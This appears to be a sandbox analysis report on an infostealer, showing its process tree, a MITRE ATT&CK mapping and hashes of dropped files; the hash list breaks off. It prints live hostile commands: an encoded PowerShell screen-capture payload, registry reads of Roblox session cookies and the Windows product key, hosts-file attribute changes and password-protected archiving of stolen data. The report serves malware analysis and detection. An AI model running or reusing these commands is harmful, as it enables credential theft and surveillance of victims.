    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:2720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4028
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rnfxw2xg\rnfxw2xg.cmdline"
        5⤵
        
        PID:1740
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA73C.tmp" "c:\Users\Admin\AppData\Local\Temp\rnfxw2xg\CSC5FC659A75CAA46058552AFFABE9852F5.TMP"
        6⤵
        
        PID:3980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:688
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4908
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3192
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1636
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:916
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1164
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3420
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4540
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3624
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI34162\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\rGF3t.zip" *"
    3⤵
    PID:1788
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3980
  - - C:\Users\Admin\AppData\Local\Temp\_MEI34162\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI34162\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\rGF3t.zip" *
      4⤵
      Executes dropped EXE
      PID:1112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1956
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3624
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4452
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2864
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4604
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4788

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
1⤵
PID:3328

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe e0df6b9cbd6964327f4396a847e2f597 J76lDtjN8EmiAseMoizKMg.0.1.0.0.0
1⤵
PID:1504

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
020d1cbef5aeb22088c0faff8d76af4e

SHA1
93e7f27b8fb57cfea4ae330bedcace1a8ce7c014

SHA256
cb283829df7f7ca2f7f8072ed014bebb7d424581e8672a9fa5683f3674726bb0

SHA512
1046228ed9d08e5296c02409b5aa460e8280a633f7f2022ec7dc7c1e750522260006844bd5114ec713593bce1d10b8932963a8630e6707e76b45a0cb8c8ff53d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0f59cccd39a3694e0e6dfd44d0fa76d

SHA1
fccd7911d463041e1168431df8823e4c4ea387c1

SHA256
70466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401

SHA512
5c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
419aced056d3404027e6e98406128135

SHA1
663f09c0e266d9646d0edc4e200f163021beedbb

SHA256
674991a178ed34268cc4728bf3a433cf441b2cbce093438d2336fb2337a503de

SHA512
1e3b907847c4709c7cc50c0023fe689a95f28dc989fa05f18152e002ec476ce1cb3e3f48c56244a8b05ee9cbd42777e8f3ab6caa064d24579cc8be6c2ef646bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
65318aecb94ae48ac4697439bccd878d

SHA1
71cfe035861bbcdde8e1f3fd77c4194067113a20

SHA256
4b2269666513fe785775ddc4cefa4484d065275f79b3a36a4dcd844d1a41ac28

SHA512
b439cf28c5c0b33775121837dc25e69152976f629f42f9cd54d417bb5b7350232c9a47857712799e24ecf206e5e78ffe9d36c57f80b0cc8be8d2376ecfd4c3f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4938e5eb6059a310ae02f9bfadfb78db

SHA1
f0c0e0b32dbed47752f09e5adee4220e07ebb23c

SHA256
5aaa9cf63b02d17dd45817f0eb0733ebee8cb7358d744723884fae1d9b0516b0

SHA512
8b198d3578c834059fbe667077dcdf102e4d02018f576daf566a1ed03cea61c70a41ae917e3f513a003fd7c57793c177ef8dd11af05dcf3f0eccfd72fe2b43c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA73C.tmp

Filesize
1KB

MD5
230a6639077df644b68d7c619d4c7d58

SHA1
51ec3e42d869b9acce7d2240a6a1aa3ff453bacc

SHA256
7827cc0f4e74c14cb2d4794dec1937939243cbdc97a86d153aec8f013cee1ba7

SHA512
3d7b68b7c52888a7b4ea309c5bd74ab3d41ac7d76c5e5d53b4f70c98ececc3faa0dc852ee5bb5d1c487feb33cff493c40d732e98ba57c8a2d5be74fc257a11b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34162\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34162\_bz2.pyd

Filesize
48KB

MD5
20a7ecfe1e59721e53aebeb441a05932

SHA1
a91c81b0394d32470e9beff43b4faa4aacd42573

SHA256
7ebbe24da78b652a1b6fe77b955507b1daff6af7ff7e5c3fa5ac71190bde3da8

SHA512
99e5d877d34ebaaaeb281c86af3fff9d54333bd0617f1366e3b4822d33e23586ef9b11f4f7dd7e1e4a314c7a881f33123735294fe8af3a136cd10f80a9b8d902

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34162\_ctypes.pyd

Filesize
58KB

MD5
5006b7ea33fce9f7800fecc4eb837a41

SHA1
f6366ba281b2f46e9e84506029a6bdf7948e60eb

SHA256
8f7a5b0abc319ba9bfd11581f002e533fcbe4ca96cedd37656b579cd3942ef81

SHA512
e3e5e8f471a8ca0d5f0091e00056bd53c27105a946ca936da3f5897b9d802167149710404386c2ed3399b237b8da24b1a24e2561c436ed2e031a8f0564fbbc7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34162\_decimal.pyd

Filesize
106KB

MD5
d0231f126902db68d7f6ca1652b222c0

SHA1
70e79674d0084c106e246474c4fb112e9c5578eb

SHA256
69876f825678b717c51b7e7e480de19499d972cb1e98bbfd307e53ee5bace351

SHA512
b6b6bfd5fde200a9f45aeb7f6f845eac916feeef2e3fca54e4652e1f19d66ae9817f1625ce0ed79d62e504377011ce23fd95a407fbdbaa6911a09e48b5ef4179

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34162\_hashlib.pyd

Filesize
35KB

MD5
a81e0df35ded42e8909597f64865e2b3

SHA1
6b1d3a3cd48e94f752dd354791848707676ca84d

SHA256
5582f82f7656d4d92ed22f8e460bebd722e04c8f993c3a6adcc8437264981185

SHA512
2cda7348faffabc826fb7c4eddc120675730077540f042d6dc8f5e6921cf2b9cb88afcd114f53290aa20df832e3b7a767432ea292f6e5b5b5b7d0e05cf8905a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34162\_lzma.pyd

Filesize
85KB

MD5
f8b61629e42adfe417cb39cdbdf832bb

SHA1
e7f59134b2bf387a5fd5faa6d36393cbcbd24f61

SHA256
7a3973fedd5d4f60887cf0665bcb7bd3c648ad40d3ae7a8e249d875395e5e320

SHA512
58d2882a05289b9d17949884bf50c8f4480a6e6d2b8bd48dfdbcb03d5009af64abf7e9967357aeebf95575d7ef434a40e8ad07a2c1fe275d1a87aa59dcc702d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34162\_queue.pyd

Filesize
25KB

MD5
0da22ccb73cd146fcdf3c61ef279b921

SHA1
333547f05e351a1378dafa46f4b7c10cbebe3554

SHA256
e8ae2c5d37a68bd34054678ae092e2878f73a0f41e6787210f1e9b9bb97f37a0

SHA512
9eece79511163eb7c36a937f3f2f83703195fc752b63400552ca03d0d78078875ff41116ebaeb05c48e58e82b01254a328572096a17aaad818d32f3d2d07f436

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34162\_socket.pyd

Filesize
43KB

MD5
c12bded48873b3098c7a36eb06b34870

SHA1
c32a57bc2fc8031417632500aa9b1c01c3866ade

SHA256
6c4860cb071bb6d0b899f7ca2a1da796b06ea391bac99a01f192e856725e88aa

SHA512
335510d6f2f13fb2476a5a17445ca6820c86f7a8a8650f4fd855dd098d022a16c80a8131e04212fd724957d8785ad51ccaff532f2532224ccfd6ce44f4e740f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34162\_sqlite3.pyd

Filesize
56KB

MD5
63618d0bc7b07aecc487a76eb3a94af8

SHA1
53d528ef2ecbe8817d10c7df53ae798d0981943a

SHA256
e74c9ca9007b6b43ff46783ecb393e6ec9ebbdf03f7c12a90c996d9331700a8b

SHA512
8280f0f6afc69a82bc34e16637003afb61fee5d8f2cab80be7d66525623ec33f1449b0cc8c96df363c661bd9dbc7918a787ecafaaa5d2b85e6cafdcf0432d394

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34162\_ssl.pyd

Filesize
65KB

MD5
e52dbaeba8cd6cadf00fea19df63f0c1

SHA1
c03f112ee2035d0eaab184ae5f9db89aca04273a

